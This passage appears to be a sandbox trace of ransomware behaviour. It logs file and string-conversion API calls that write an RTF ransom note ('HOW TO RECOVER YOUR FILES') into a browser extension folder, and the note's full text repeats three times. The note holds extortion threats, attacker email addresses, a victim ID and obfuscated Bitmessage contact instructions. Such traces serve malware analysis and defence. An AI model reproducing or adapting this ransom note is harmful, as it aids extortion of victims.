data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\pl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.585] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.585] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.585] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn 